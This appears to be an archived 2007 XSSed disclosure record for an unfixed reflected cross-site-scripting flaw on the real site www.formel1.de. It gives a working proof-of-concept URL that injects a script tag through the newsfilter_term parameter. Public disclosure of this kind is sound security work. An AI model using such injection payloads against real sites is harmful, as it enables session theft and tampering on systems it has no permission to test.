Unfixed XSS vulnerability at www.formel1.de

2007-04-15T00:00:00
ID XSSED:6093
Type xssed
Reporter TotalSchaden
Modified 2007-04-15T00:00:00

Description

Security researcher TotalSchaden, has submitted on 15/04/2007 a cross-site-scripting (XSS) vulnerability affecting www.formel1.de, which at the time of submission ranked 93030 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/04/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.formel1.de/index.php?aid=15&newsfilter_term=TotalSchaden%22%3E%3Cscript%3Ealert(/TotalSchaden/)%3C/script%3E&newsfilter_target=all&newsfilter_fromDay=0&newsfilter_fromMonth=0&newsfilter_fromYear=0&newsfilter_toDay=0&newsfilter_toMonth=0&newsfilter_toYear=0&newsfilter_category=0&newsfilter_driver=0&newsfilter_team=0&newsfilter_trigger_search=Suchen